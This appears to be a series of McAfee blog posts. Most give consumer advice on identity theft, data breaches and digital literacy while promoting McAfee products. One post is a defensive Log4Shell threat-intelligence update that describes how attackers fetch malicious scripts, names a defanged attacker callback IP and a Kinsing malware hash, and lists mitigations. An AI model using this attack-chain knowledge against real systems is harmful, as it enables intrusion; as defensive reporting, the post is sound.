And here’s another big help. A password manager. You likely have dozens of passwords, plus a few more that you’ve probably forgotten about. You can protect your passwords and the accounts associated with them with a password manager that creates and securely stores a strong, unique password for each of your accounts. Plus, you can use it to update those passwords on the regular. Few things make it tougher for hackers than strong, unique passwords that get changed often. In a time of data breaches and account theft, a password manager is a great call.
While it’s important to focus on protecting things like laptops, phones, photos, files, and data, you’re ultimately protecting something far greater You. Your privacy, your personal information, your accounts, all the things that taken together make you—you. The thing is that our lives are more fluid and mobile than ever before. One moment we’re banking on our laptop, the next we’re splitting the cost of dinner with a payment on our phone. The constant here is you. You’re at the center of all this activity regardless of the device you’re using. The same goes for your family and the people you care about.
That’s why we protect people, not just their devices.
McAfee Identity Protection Service monitors the dark web for your personal info such as emails and associated passwords, up to 60 different types of critical info. If we detect that your data was stolen, you’ll get immediate alerts on the devices of your choice and guidance on how to secure your info quickly and effectively. In all, you can keep tabs on your identity any time you’re connected to the internet, and if an issue crops up you can click, solve, and carry on.
Extended identity protection offers up the extra comfort of knowing that you have licensed recovery pros on the case if identity theft does happen to you. This includes monitoring and restoration services, along with identity theft insurance for lawyer fees, travel expenses, lost wages, and more.
While that’s just a few of the ways McAfee has your back, we hope it gives you a good sense of what online protection should do—how it should protect you and all the things connected to you. And on today’s internet, that’s quite a bit. There’s so much to experience online today, and we believe you should enjoy all of it, freely and with the confidence that comes from knowing you’re safe.
The post The Internet is for Everyone to Enjoy—We’re Helping See to It appeared first on McAfee Blog.
What’s the difference between identity fraud and identity theft? Well, it’s subtle, so much so that it’s easy to use them nearly interchangeably. While both can take a bite out of your wallet, they are different—and knowing the differences can help you know understand what’s at stake.
Let’s start with an overview and a few examples of each.
So there’s that subtle difference we mentioned. Identity fraud involves misuse of an existing account. Identity theft means the theft of your personal information, which is then used to impersonate you in some way, such as opening new accounts in your name.
Above and beyond those definitions and examples, a couple of real-life examples put the differences in perspective as well.
As for identity fraud, individual cases of fraud don’t always make the headlines, but that’s not to say you won’t hear about it a couple of different ways.
The first way may be news stories about data breaches, where hackers gain things like names, emails, and payment information from companies or organizations. (Chipotle, RobinHood, and T-Mobile being recent examples.) That info can then end up in the hands of a fraudster, who then accesses those accounts to drain funds or make purchases.
On a smaller scale, you may know someone who has had to get a new credit or debit card because theirs was compromised, perhaps by a breach or by mistakenly making a payment through an insecure website or by visiting a phony login page as part of a phishing attack. These can lead to fraud as well.
Identity theft took on new forms during the pandemic, such as was the case of a Rhode Island man charged with nearly half a million dollars in a pandemic unemployment fraud case. Authorities allege that the man-made 85 unemployment claims in 2020 using the identities of several other people.
Similarly, a Massachusetts man was sentenced for filing fraudulent claims for relief funds, as well as open store credit accounts using fake identities. Court proceedings alleged that the personal information used to commit this fraud came from several sources, including information stolen from a realty company that collected that information from potential renters.
Identity theft can stem from the workplace as well, such as the sentencing of a Maryland man who used stolen lists of personal information from his former employer. From there, he was found guilty of garnering more than a million dollars in funds from food assistance programs and fraudulent car loans.
Identity theft can run far deeper than these examples. Because it effectively allows someone else to pose as you, an identity thief can do more than drain your accounts. They can also claim health insurance benefits, file taxes in your name, or possibly purchase the property. Further, an identity thief can potentially get a job, driver’s license, or other forms of ID in your name, which could ruin your credit history, reputation, or even create a police record in your name.
So while both identity fraud and identity theft are certainly something you want to prevent, identity theft holds the potential to affect far-reaching aspects of your life—which marks a distinct difference between the two.
It usually starts with someone saying anything from, “That’s strange …” to “Oh, no!” There’ll be a strange charge on your credit card bill, a piece of mail from a bill collector, or a statement from an account you never opened—just to name a few things.
With that, I have a few recent blogs that help you spot all kinds of identity crime, along with advice to help keep it from happening to you in the first place:
While there are differences between identity fraud and identity theft, they do share a couple of things in common: you can take steps to prevent them, and you can take steps to limit their impact should you find yourself faced with one or the other.
The articles called out above will give you the details, yet staying safe begins with vigilance. Check on your accounts and credit reports regularly and really scrutinize what’s happening in them. Consider covering yourself with an —and act on anything that looks strange or outright fishy by reporting it to the company or institution in question.
The post What’s the Difference Between Identity Fraud and Identity Theft? appeared first on McAfee Blog.
Log4j/Log4shell is a remote code execution vulnerability (RCE) in Apache software allowing attackers unauthenticated access into the remote system. It is found in a heavily utilized java open-source logging framework known as log4j. The framework is widely used across millions of enterprise applications and therefore a lucrative target for threat actors to exploit. The availability of the POC exploit and ease of exploitation triggered the widespread exploitation attempts that we are now witnessing.
CVE-2021-44228 – Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability Under Exploitation.
Should the vulnerability be present, an attacker might run arbitrary code by forcing the application or server to log a specific string. This string can force the vulnerable system to download and run a malicious script from the attacker-controlled system, which would allow them to effectively take over the vulnerable application or server.
A full technical analysis can be found here:
McAfee Advanced Threat Research: Log4Shell Vulnerability is the Coal in our Stocking for 2021
In this blog, we present an overview of how you can mitigate the risk of this vulnerability exploitation with McAfee Enterprise solutions. Due to the severity of this vulnerability and the observed exploitation attempts already taking place, the KB article linked below will be continually updated to communicate detailed actions to mitigate risk with McAfee Enterprise products. Subscribe to this KB article to receive updates pertaining to related coverage and countermeasures.
KB95091: McAfee Enterprise coverage for Apache Log4j CVE-2021-44228 Remote Code Execution
Organisations preparing to defend against this threat needs to think beyond the initial access vector. What the vulnerability allows a threat actor to do is initially only connect to a remote endpoint and establish a beachhead. The attacker only gets a return on investment when they can exploit that initial foothold either to move laterally, execute additional payloads on the endpoint or attack other organisations as part of a botnet. Instead of just focusing on the initial access vector, let’s look at the entire defensive kill chain.
The impact on organisations varies between resource takeover, denial of service or data theft. Therefore, making visibility in attack patterns and trend via threat intelligence extremely critical. In addition, other attack vectors have been discovered which allows for local exploitation of the log4j library over WebSocket.
Let’s walk through the defense lifecycle in more details
Threat Intelligence is critical to adapt security controls and gain an understanding of attacker techniques and active campaigns exploiting the vulnerability
The MVISION Insights platform reports threat intelligence related to the Log4j attacks under the campaign name Log4Shell – A Log4j Vulnerability – CVE-2021-44228.
The Global Prevalence map snapshots captured on the 10th and 16th December 2021 demonstrates how impactful has being the vulnerability so far and how fast activity, both defender and attack, is increasing and spreading worldwide.
MITRE Techniques Observed:
As we are writing this blog, on MVISION Insights there are 1,813 IOCs including MD5, SHA256, URL, IP, DOMAIN, HOSTNAME. In terms of Determinism, 1,632 are unique and 30 are commodity.
The top MD5 detected so far has been related to Kinsing (MD5: 648effa354b3cbaad87b45f48d59c616), a crypto miner with backdooring features. The file runs on Linux machines and has been uploaded on Virus Total for the first time in December 2020. Its detection increased by 161% between the 11th and the 15th of December 2021 and it is currently observed in 19 different countries. The log4j vulnerability is helping threat actors to push Kinsing malware via encoded payloads to vulnerable services exposed to the internet. And this is just the tip of the iceberg. We are actively monitoring for and analyzing new payloads.
The same unique indicator is also reported as part of other two threat campaign on MVISION Insights:
Since April 2020, when the Kinsing crypto miner was discovered, further developments of the malware have occurred including a rootkit component and other features that make detection harder. Kinsing comes with multiple shell scripts that download and install the backdoor, miner, and rootkit alter the system itself.
The IP address 45.155.205[.]233 included within the MVISION Insights IOCs and used by threat actor as a log4j callback attack server has been detected 6,884 times by December 4th topping 15,106 detections by December 7th. Most detected countries included the United States, Turkey, Thailand, UK, Taiwan, and Italy.
MVISION Insights also includes indicators related to unique variants of MIRAI botnet that McAfee observed being leveraged by threat actors to exploit the log4j vulnerability.
Shell scripts are using wget and curl tools for external communication as part of the attack chains analyzed.
Latest updates highlighted Conti ransomware group actively leveraging the Log4Shell exploit to gain access to internal corporate resources and lunch their malicious payloads. But also, Khonsari group and state sponsored APT35 have been reported by researchers.
In this case, you should detect and prioritise internet facing applications running java-based web servers such as Apache Tomcat, either isolate or patch these resources. Run vulnerability scans for both monolithic and containerized workloads to build an inventory of assets that might be impacted.
Continuously discovers your cloud resources and can run vulnerability scans for Virtual Machines and Containerized workloads in the cloud. MVISION Cloud has the ability to build an inventory of running processes within workloads as part of it application control capabilities. If log4j is used as a separate package we will detect the vulnerability in both runtime and container registry. If the log4j is included in the java binary we will not be able to scan it.
Ensure you run configuration audits for cloud assets that allow unrestricted outbound access and does not use firewalls or NAT GW’s for outbound connections. Run configuration audits for secondary misconfigurations that might allow the attacker to exploit IAM to elevate privileges, gain persistence or takeover other resources.
Compares the available defensive capabilities on the endpoint to the attacker techniques, tools and IOC’s and highlights exposed endpoints.
You can perform real time searches in MVISION EDR to identify endpoints with Log4j binaries.
The attacker only succeeds if they can get to this stage so blocking outbound suspicious connections, preventing execution of additional payloads, and protecting credentials/auth tokens theft are things that could prove to be critical in defeating the attack. As part of the available threat intelligence attackers are using several post exploit methodologies to pivot from the original log4j injection vulnerability. This varies from misuse of resources with crypto miners, deploying malware, or exfiltrating sensitive information.
Use Application Control (VM and Containers) to kill unverified server processes and payloads from executing.
OS Hardening (VM) – ensure that SE Linux state is enforcing
Use UCE URL filtering and Remote Browser Isolation to prevent browser-based exploit attempts over WebSocket and C2 attempts.
Use signature-based protection in ENS 10.7 to block known hashes of second stage malicious payloads. On December 12, 2021, McAfee Enterprise released V3 AMCore content 4648 (ENS) and V2 DAT 10196 (VSE). Generic detections are provided under the title Exploit-CVE-2021-44228.C.
In ENS (Endpoint Security) 10.7 update 4 and above, there is a powerful security feature available to every defender, which is the ability to trigger a memory scan from an Expert Rule. For more details on this capability, please see this blog post from our AC3 team
https://www.mcafee.com/blogs/enterprise/log4j-and-the-memory-that-knew-too-much
Additionally, it is recommended to enable the ENS ATP rules that prevent or detect post exploitation techniques such of second stage payload execution, credential dumping or encryption activity from ransomware, use of malicious tools or lateral movement.
An Emergency User Defined Signature has been written and tested by McAfee Enterprise to provide immediate protection against the Apache Log4j2 Remote Code Execution Vulnerability.
For details on latest signatures, please follow the KB…KB95091: McAfee Enterprise coverage for Apache Log4j CVE-2021-44228 Remote Code Execution
Assuming breach is critical especially if you know that you had exposed assets and therefore, build forensics and post exploitation detection techniques this includes exploitation of living of the land binaries (LOLBINS), credential dumping as well as using information such as known file hashes / hunting queries to query web server / reverse proxy/ Network IPS logs.
In addition to an Intelligence Summary, Insights provides exportable YARA rules to find additional Indicators of Compromise.
As mentioned above, you can leverage Real Time and Historical Search functionality to proactively identify vulnerable systems or post exploit activity such as…
Identify Indicators of Compromise associated with exploit payloads
Along with control on the endpoint, visibility into attacks and where data is being uploaded is also critical to stopping Data Exfiltration. Mapping threats to the MITRE ATT&CK Framework will provide visibility into ongoing attacks happening in the cloud and where security controls can be improved to stop future attacks.
Another critical method to stopping the exfiltration of data is putting restrictions against data uploads to non-sanctioned cloud storage. Limiting data uploads to only sanctioned Cloud Service Providers can stop external and insider threats from transferring data to Cloud Services that are questionable or not sanctioned. The Cloud Registry within MVISION Cloud/Unified Cloud Edge will provide ratings for well over 25,000 Cloud Service Providers so restrictions can be placed on CSPs with high risks or attributes that put company data at risk.
The current situation is dynamic and our resources to help you understand the attack and mitigations available are also evolving. For the latest updates on McAfee Enterprise threat intelligence and defender resources please continue to follow these sites
MCFE Log4Shell Vulnerability KB: https://kc.mcafee.com/corporate/index?page=content&id=KB95091
MCFE Log4Shell Security Bulletin: https://kc.mcafee.com/corporate/index?page=content&id=SB10377
MCFE Log4Shell Vulnerability Blog: https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/
MCFE Log4Shell Exploit Demonstration by McAfee ATR: https://www.linkedin.com/posts/mcafeeenterprise_cve-2021-44228-log4shell-exploitation-activity-6876241150219485184-URLE
MCFE LinkedIn Live Customer Briefing: https://www.linkedin.com/posts/mcafeeenterprise_mcafee-enterprise-atr-explore-the-internet-breaking-activity-6876614287197122560-wNuD
FEYE Log4Shell Vulnerability KB: https://community.fireeye.com/s/article/000003827
The post Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 appeared first on McAfee Blog.
Most of us take our skills for granted when it comes to technology. We move effortlessly between applications and multiple devices. We install new software, set up numerous accounts, and easily clear technical hurdles that come our way. Unfortunately, that picture isn’t the norm for many older adults.
Engaging with technology can be challenging for older adults. However, when digital literacy skills are neglected or avoided, everyday activities such as online bill paying, shopping, medical appointments, and even social media can be overwhelming. And, since the pandemic, the digital divide between older adults and digital skills has become even more evident.
One Pew study revealed that older adults continue to lag behind younger adults when it comes to technology adoption in that 41% do not use the internet at all, 23% do not use cell phones, and over 75% say they require help when learning how to use new technology.
The Pew study also highlighted good news: Attitudes shift for the better when older adults increase their digital skills and access the Internet more frequently. Fully 79% of older adults who use the internet regularly agree with the statement that “people without internet access are at a real disadvantage because of all the information they might be missing.” In comparison, 94% agree with the statement that “the internet makes it much easier to find information today than in the past.”
So how can we help the older adults in our lives grow both their digital skills and their confidence? Building practical digital skills begin with a commitment to one another, to consistency, and to learning. Here are some tips to get you started.
If you are helping an older adult build their digital skills, it’s crucial to schedule dedicated training time. Commitment and consistency will be key to achieving real results. If you’re the older adult learning on your own, set aside dedicated learning time with clear goals. For instance, “Each day this week from 7 a.m. to 9 a.m. I will learn how to set up my email and how to maximize security on all my devices.”
Fortunately, more and more resources are emerging to help older adults bridge their technology gaps, and most are free. A few places to begin include AARP’s Senior Planet, Candoo Tech, and GetSetUp. To find a program in your area, go to at3center.net.
Online security is one of the most critical conversations you can have with the older adults in your life. Following best practices such as installing security software, using strong passwords with Two-Factor Authentication (2FA), understanding data privacy, and knowing how to identify phishing and malware scams are fundamental components of digital literacy. For a deeper dive into cybersecurity best practices, read more.
Older adults can easily fall prey to scams, conspiracies, hoaxes, and false news stories online. A recent study out of Princeton and NYU found that, prior to the 2016 election, adults over 65 were seven times more likely than those under 29 to post articles from fake news domains. Understanding how to spot misinformation online is a critical skill for anyone online. One resource to build media literacy is MediaWise for Seniors, a series of free online courses by Poynter designed to help older adults detect and combat fake news and misinformation. In addition, consider dialogue on how to challenge each piece of digital content by asking:
Jargon excludes and when you use insider language with a non-technical person, it can get overwhelming. Slow down. Use ordinary terms. For instance, instead of the hyperlink, consider “link.” Instead of URL, opt for “website address.” Rather than DM/PM, use “Private Message.” Note: Avoiding jargon doesn’t mean you dumb down to a person; it means using plain language to explain the same concept.
It’s a myth (and an unfortunate stereotype) that older adults don’t have the ability or don’t want to learn about technology. Frankly, they can, and they do. However, physical and mental changes are part of the aging process, which means repetition and patience are part of the process. Consider creating easy-to-read cheat sheets to summarize the day’s lesson.
Technology is impacting our lives in myriad ways, and no one feels this reality pressing in more than older adults. If you find yourself in the privileged position of coaching an older adult toward digital confidence, remind them of the gains ahead and that the gap from “here” to “there” isn’t nearly as large as they’ve imagined. Whenever possible, point their sights to the proven benefits of stepping off the sidelines and into a connected world.
The post Helping Older Adults Build Strong Digital Literacy Skills appeared first on McAfee Blog.
Most of us use the internet every day, so we’re comfortable sharing a lot of information online. However, cybercriminals want us to get a bit too comfortable so they can take our personal or financial data and use it for their benefit. This is called identity theft, and it can cost people money and may dip their credit score.
Fortunately, you can help minimize what happens by knowing the signs of identity theft and taking fast action when you recognize them. Find out how below.
Being online comes with many benefits, but it can also come with some risks. Identity theft usually begins with the criminal accessing sensitive personal data, such as Social Security numbers, birth dates, home addresses, bank account information, and driver’s license details. The fraudster can then take this information to fake your identity, using it to take out credit cards, apply for loans, and more.
Here’s a quick look at some ways identity thieves can get their hands on your valuable data:
There are many ways thieves can get their hands on your data. Luckily, there are ways you can protect yourself against these methods. For example, you can protect your computer, tablet, or mobile device against hackers by equipping it with a strong password and safeguarding against phishing by adding a firewall and utilizing a virtual private network (VPN) like those offered by McAfee.
With some best practices, you can protect your data and help safeguard you and your family against identity theft. One way to continue living your best life online is to watch for potential warning signs of identity theft. This ensures you can take fast action and minimize the effects if you’re targeted. Here are some essential signs to look out for.
Financial identity theft is one of the most common types of identity theft, and credit cards are a popular target. The rise in online shopping has made credit card fraud even more common.
Your online banking portal or app should allow you to set up alerts to email, call, or text you about suspected fraudulent credit card charges. If you get an alert, someone may have taken your identity.
If you apply for a loan or line of credit and your application is denied, dig deeper. A rejection could indicate that your credit score is lower than you thought, possibly due to fraudulent activity. For example, someone may use your information to get new credit cards and not pay them off, leaving you responsible.
Changes in your credit score can indicate identity theft. For example, if someone takes out utility bills in your name and doesn’t pay them, your credit score may dip. Checking your credit report from each of the three major credit bureaus (Equifax, Experian, and TransUnion) can help pinpoint the problem.
The Federal Trade Commission (FTC) allows U.S. consumers to get a free credit report every 12 months. Just visit AnnualCreditReport.com to get a copy of yours from the credit reporting agencies. You can also pay for credit monitoring services to track your score.
Once identity thieves obtain enough data, including your name and address, they might be able to open new accounts and credit cards. When you check your credit report, keep an eye out for new accounts that you didn’t open. Another red flag is if you start getting bank statements or bills addressed to you for accounts you don’t recognize.
Companies are required to notify customers of data breaches that could impact them. For example, if you save your payment information and home address on a music streaming provider’s website and their database is hacked, identity thieves may get your data. Keep an eye out for notifications and read the news. The McAfee blog is another great resource for information on data breaches.
If debt collectors start calling, be cautious, especially if they’re referring to accounts you aren’t familiar with. Don’t provide personal information to any collection agencies that call, as this can be a potential phishing scam. However, it’s a good idea to follow up on these cases by checking your credit report for new accounts. You could be liable if someone opened accounts under your name and didn’t pay them.
Medical theft occurs when a fraudster imitates another person to get health care or supplies. For example, a person might use your identity to get prescription medication at a pharmacy. If you get unfamiliar medical bills, follow up. Incorrect medical records could impact your insurance premiums or interfere with your ability to get the care you need in the future.
This could be an indicator of synthetic identity theft. This occurs when a fraudster creates a fake identity using various people’s real information. For example, they may use your address and Social Security number and another person’s photo to create a fake persona that’s creditworthy. They can then take out credit cards in that fake person’s name.
If you receive a confirmation of an annual tax filing before you’ve filed, take note. Criminals may try to file a tax return for another person to access their tax refund. Alternatively, you may find that you’re unable to e-file your taxes, which can occur if someone else has already filed under your name.
No one wants their identity stolen, but it’s still good to be prepared if it does happen. If you notice the above red flags, here are some steps you may need to take:
You may also want to visit IdentityTheft.gov to report identity theft and find resources to help guide your recovery plan.
Worries about identity fraud shouldn’t prevent your household from enjoying the benefits of a connected world. McAfee’s identity theft protection services can help you enjoy everyday conveniences while keeping you safe. Packages can be tailored to your needs, including 24/7 monitoring, ID theft coverage, VPN services, and more. It’s guided online protection made easy.
The post 9 Ways to Determine If Your Identity Has Been Stolen appeared first on McAfee Blog.
Did you just get word that your personal information may have been caught up in a data breach? If so, you can take steps to protect yourself from harm should your info get into the hands of a scammer or thief.
How does that information get collected in the first place? We share personal information with companies for multiple reasons simply by going about our day—to pay for takeout at our favorite restaurant, to check into a hotel, or to collect rewards at the local coffee shop. Of course, we use our credit and debit cards too, sometimes as part of an online account that tracks our purchase history.
In other words, we leave trails of data practically wherever we go these days, and that data is of high value to hackers. Thus, all those breaches we read about.
Whether it’s a major breach that exposes millions of records or one of many other smaller-scale breaches like the thousands that have struck healthcare providers, each one serves as a reminder that data breaches happen regularly and that we could find ourselves affected. Depending on the breach and the kind of information you’ve shared with the business or organization in question, information stolen in a breach could include:
What do crooks do with that data? Several things. Apart from using it themselves, they may sell that data to other criminals. Either way, this can lead to illicit use of credit and debit cards, draining of bank accounts, claiming tax refunds or medical expenses in the names of the victims, or, in extreme cases, assuming the identity of others altogether.
In all, data is a kind of currency in of itself because it has the potential to unlock several aspects of victim’s life, each with its own monetary value. It’s no wonder that big breaches like these have made the news over the years, with some of the notables including:
As mentioned, these are big breaches with big companies that we likely more than recognize. Yet smaller and mid-sized businesses are targets as well, with some 43% of data breaches involving companies of that size. Likewise, restaurants and retailers have seen their Point-of-Sale (POS) terminals compromised, right on down to neighborhood restaurants.
When a company experiences a data breach, customers need to realize that this could impact their online safety. If your favorite coffee shop’s customer database gets leaked, there’s a chance that your personal or financial information was exposed. However, this doesn’t mean that your online safety is doomed. If you think you were affected by a breach, you can take several steps to protect yourself from the potential side effects.
One of the most effective ways to determine whether someone is fraudulently using one or more of your accounts is to check your statements. If you see any charges that you did not make, report them to your bank or credit card company immediately. They have processes in place to handle fraud. While you’re with them, see if they offer alerts for strange purchases, transactions, or withdrawals.
Our credit monitoring service can help you keep an eye on this. It monitors changes to your credit score, report, and accounts with timely notifications and guidance so you can take action to tackle identity theft.
Breached and stolen information often ends up in dark web marketplaces where hackers, scammers, and thieves purchase it to commit yet more crime. Once it was difficult to know if your information was caught up in such marketplaces, yet now an identity monitoring service can do the detective work for you.
Our service monitors the dark web for your personal info, including email, government IDs, credit card and bank account info, and more. This can help keep your personal info safe with early alerts that show you if your data is found on the dark web, an average of 10 months ahead of similar services. From there, you’ll get guidance that you can act on, which can help protect your info and accounts from theft.
If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity. You can place one fraud alert with any of the three major credit reporting agencies (Equifax, Experian, TransUnion) and they will notify the other two. A fraud alert typically lasts for a year, although there are options for extending it as well.
Freezing your credit will make it highly difficult for criminals to take out loans or open new accounts in your name, as a freeze halts all requests to pull your credit—even legitimate ones. In this way, it’s a far stronger measure than placing a fraud alert. Note that if you plan to take out a loan, open a new credit card, or other activity that will prompt a credit report, you’ll need to take extra steps to see that through while the freeze is in place. (The organization you’re working with can assist with the specifics.) Unlike the fraud alert, you’ll need to contact each major credit reporting agency to put one in place. Also, a freeze lasts as long as you have it in place. You’ll have to remove it yourself, again with each agency.
You can centrally manage this process with our security freeze service, which stops companies from looking at your credit profile, and thus halts the application process for loans, credit cards, utilities, new bank accounts, and more. A security freeze won’t affect your credit score.
Ensure that your passwords are strong and unique. Many people utilize the same password or variations of it across all their accounts. Therefore, be sure to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials, such as the one you’ll find in comprehensive online protection software.
If the unfortunate happens to you, an identity theft coverage & restoration service can help you get back on your feet. Ours offers $1 million in coverage for lawyer fees, travel expenses, and stolen funds reimbursement. It further provides support from a licensed recovery expert who can take the needed steps to repair your identity and credit. In all, it helps you recover the costs of identity theft along with the time and money it takes to recover from it.
You can take this step any time, even if you haven’t been caught up in a data breach. The fact is that data broker companies collect and sell thousands of pieces of information on millions and millions of people worldwide, part of a global economy estimated at $200 billion U.S. dollars a year. And they’ll sell it to anyone—from advertisers for their campaigns, to scammers who will use it for spammy emails, texts, and calls, and to thieves who use that information for identity theft.
Yet you can clean it up. Our personal data cleanup service can scan some of the riskiest data broker sites and show you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites and, with select products, even manage the removal for you.
Comprehensive online protection software will offer you the tools and services listed above, along with further features that can protect you online. That includes a VPN to keep your time online more private from online data collection while protecting it from thieves who’re out to steal credit card and account information. It also includes web browsing protection that can warn you of sketchy websites and malicious downloads that look to steal your information. In all, it’s thorough protection for your devices, privacy, and identity. And in a time of data breaches, that kind of protection has become essential.
The post How to Protect Yourself From Identity Theft After a Data Breach appeared first on McAfee Blog.
We’re online more than ever, in large part because it allows us to take advantage of online conveniences like bill pay and booking appointments. But these many benefits might also leave us exposed to risks, like identity theft.
Identity theft is characterized by one person using another’s personal or financial data for their benefit. Cybercriminals may take information like a person’s name, birthday, Social Security number, driver’s license number, home address, and bank account information and use it for their benefit. A name and matching financial information, for instance, can be used to apply for credit cards or open new accounts.
The good news is that you can safeguard yourself and your family with some best practices — allowing you to enjoy your best life online and worry less about cybercriminals. Share these 10 tips with your family to help keep your entire household safe.
A good habit to get into is to password-protect your computer, tablet, and mobile devices through unique, strong passwords. These devices are home to some of your most sensitive information, including everything from emails to apps that connect to your bank accounts. So, if these devices fall into the wrong hands, a password makes it harder to access your personal data.
Take some time to come up with your passwords, though. It’s important to create strong passwords that hackers can’t guess. A strong password will include a mix of symbols, numbers, and letters. Steer clear of simple passwords like “123456” (it might seem obvious, but this is one of the most common passwords people use). Also, avoid including information that other people can guess, like your birthdate, home address, or name.
Don’t forget to use different passwords for different accounts. If you use the same password across multiple accounts, and a fraudster gains access to one account, they may access the others. Fortunately, McAfee’s identity protection services include a password manager, which can help secure your account credentials across multiple devices. This tool encrypts passwords, storing them safely and making it easy to keep track of them.
Identity thieves are skilled at leveraging new technologies. Phishing is one great example of this. Phishing involves criminals masquerading as trustworthy entities, such as government agencies or banks, and using this trusted position to get sensitive information. Phishing scams started with traditional mail. They’re now also done via phone, text, and email.
As a general rule of thumb, never give out any personal information when contacted by a business, bank, or another entity. Also, make sure your email spam filters detect phishing attempts. Never open emails from people you don’t know, and don’t download email attachments without knowing what they are. Some phishing emails include malware, which can infiltrate your device and access personal data. A McAfee Total Protection plan is an all-in-one protection solution that can help you detect and avoid malware.
Fraudulent websites may also use phishing techniques. A website may look similar to the legitimate website of a mortgage lender, bank, or credit card company but might be a fraudulent platform seeking to get information from consumers. Always verify that any website you visit is the legitimate website of the institution, and consider McAfee antivirus software, which offers a safe browsing solution.
When financial identity theft occurs, this can also impact financial institutions like banks and lenders. So, they’re eager to prevent fraud, as well. One way they do this is through fraud alerts. You can set up your online banking to issue fraud alerts — for example, via an email, text message, or phone call — if your bank suspects suspicious activity on your account.
In some cases, a bank will also freeze your account until you verify whether the activity is legitimate. This is a common tactic used to protect against credit card fraud. Geo-control is one example: If you live in the U.S., but a German IP address uses your credit card, your credit card provider will likely issue an alert. You can also set up alerts for certain transaction amounts or types.
Your credit report is one of the most powerful tools you have at your disposal for catching identity thieves and stopping them in their tracks. You’re entitled to a free credit report every 12 months via AnnualCreditReport.com, an initiative of the Federal Trade Commission (FTC). You can get a free copy of your report from each major credit bureau: Experian, Equifax, and TransUnion.
Review your report thoroughly, checking for inaccuracies. When credit monitoring, check your:
If you find any discrepancies, contact the appropriate credit reporting company. You should also contact the relevant financial institution and visit IdentityTheft.gov. You can report the suspected identity theft and find resources to help you recover.
Social media is great for connecting with others online, but it does open the door to some vulnerabilities. Be careful about what you post, and steer clear of sharing personal details like your home address, children’s names, pet’s names, or birthdays, which some people use as passwords. If a social media platform offers two-factor authentication, opt in.
Images are another touchy subject. Never post photos that include private data, like a picture of your passport or vaccine card. Consider what’s in the background of any photos — from your home (with a house number) to mail with your address. Finally, you may want to set your visibility to private on all social media accounts, limiting who can view them. And even if your account is private, you should still follow the above tips.
Some identity thieves get people’s personal information by dumpster diving. One solution? Invest in a paper shredder. You’ll be able to shred documents into tiny bits that are hard to piece together, making it that much harder for someone else to piece together any personal information they contain.
Here are some documents worth shredding:
If you’re not sure whether something needs to be shredded, go ahead and destroy it. It only takes seconds, and you’re better off safe than sorry.
Whether you use a computer, tablet, or mobile device for many of your online activities, like paying bills, these devices contain a lot of personal data. So, it’s good to protect them from hackers. Install antivirus software like McAfee’s to protect against viruses and spyware. It would be best if you also had a firewall, which is a network security system that controls the incoming and outgoing network traffic based on set security parameters.
To take your device security a step further, you may also want to invest in a virtual private network (VPN). This helps hide your online activity. It can safeguard against hackers on public networks but is also worth using at home. It hides details like browsing activity, personal data, and IP address from potential snoops. McAfee also offers VPN services.
While your computer, tablet, or mobile device may hold a great deal of personal data, you likely also have hard copies of sensitive documents worth protecting. Documents like your birth certificate, Social Security card, and passport contain valuable information that identity thieves can use for personal gain, so you want to make sure they’re kept in a safe space.
Don’t simply shove these documents into your desk drawer. It’s best to keep them in a locked, fireproof home safe with a secure code. To keep things organized, put each document in a protective plastic sleeve and put the sleeves in a binder. This can be useful if you have a large family and need to keep track of everyone’s data.
Sophisticated hackers don’t just target individuals. They may also try to infiltrate businesses, government agencies, higher education institutions, health care facilities, and any other organization that gathers sensitive consumer information. If an entity is subject to a data breach, they’re legally required to notify any consumers who may have been impacted.
However, it’s still good to inform yourself about potential breaches that may affect you. Larger-scale data security risks are usually reported in the media. We also post about data breaches on the McAfee blog. If an entity you do business with has been affected, change your passwords and the passwords of any related accounts immediately.
Knowing possible signs of identity theft can help you catch it early so that you can continue to enjoy your time online. Educate yourself and your family about these warning signs, ensuring everybody stays safe. Here are some possible indications identity thieves have targeted you:
The internet keeps all of us connected, but that’s why identity theft protection is important. With people increasingly connected, doing more, and sharing more online, cybercriminals can pinpoint weaknesses and take advantage. Hackers are ready to leverage your information for personal gain, and identity theft is no exception.
McAfee is here to help. McAfee’s identity protection services provide 24/7 monitoring of your email addresses and bank accounts, providing up to $1 million worth of ID theft coverage. You deserve to enjoy the comfort offered by the internet without stressing about identity theft. Implement the best practices above in your household so that you and your loved ones can stay connected with confidence.
The post 10 Ways to Protect Your Identity appeared first on McAfee Blog.
The internet provides plenty of fun and exciting opportunities for you and your family, from sharing on social media to online shopping. To help you enjoy every minute of it, though, it’s good to be aware of what less savory characters are up to.
And they sure have been busy. In fact, the U.S. Federal Trade Commission (FTC) received 2.1 million fraud reports in 2020. What is identity theft? Well, it’s the fraudulent use of another individual’s name and details for personal gain.
Those affected by identity fraud may see a dip in their finances and credit scores. They may also deal with anxiety around financial security going forward. However, while it’s important to be aware of the threat of identity theft, this shouldn’t be cause for alarm. There are plenty of tools and techniques that can help protect you and your family so you can continue to enjoy everything modern technology has to offer.
The first step in protecting yourself? Educate yourself. Understanding the different types of identity theft can help you safeguard yourself and your loved ones so that you can continue all your favorite online activities. Here we’ll define and explore the different types of identity theft to watch out for.
We’ve all probably heard of identity theft, but what is it? Identity theft is when someone uses another person’s financial or personal data, usually for monetary gain. This means a fraudster may take sensitive information like names, birthdates, Social Security numbers, driver’s license details, addresses, and bank account numbers or credit card numbers. They might then use this information to make purchases, open credit cards, and even use health insurance to get medical care.
A little knowledge can go a long way in stopping cybercriminals in their tracks — especially since they’re becoming more sophisticated and coming up with new schemes every day.
Here are five common types of identity theft to help you stay one step ahead of hackers.
Financial identity theft is when one person uses another’s personal data for financial benefit. This is the most common form of identity theft (including the credit card example described above). Financial identity theft can take multiple forms, including:
The good news is that it’s easy to protect yourself against financial identity theft by checking your bank accounts, credit card statements, and bills. If you see an unexplained charge, contact your credit card company or bank immediately to report it. Also, check your credit report for changes in your score. An unexplained decrease in your score could mean fraudulent activity. You can do this through AnnualCreditReport.com, where you can get a free credit report every 12 months from each of the three major credit bureaus.
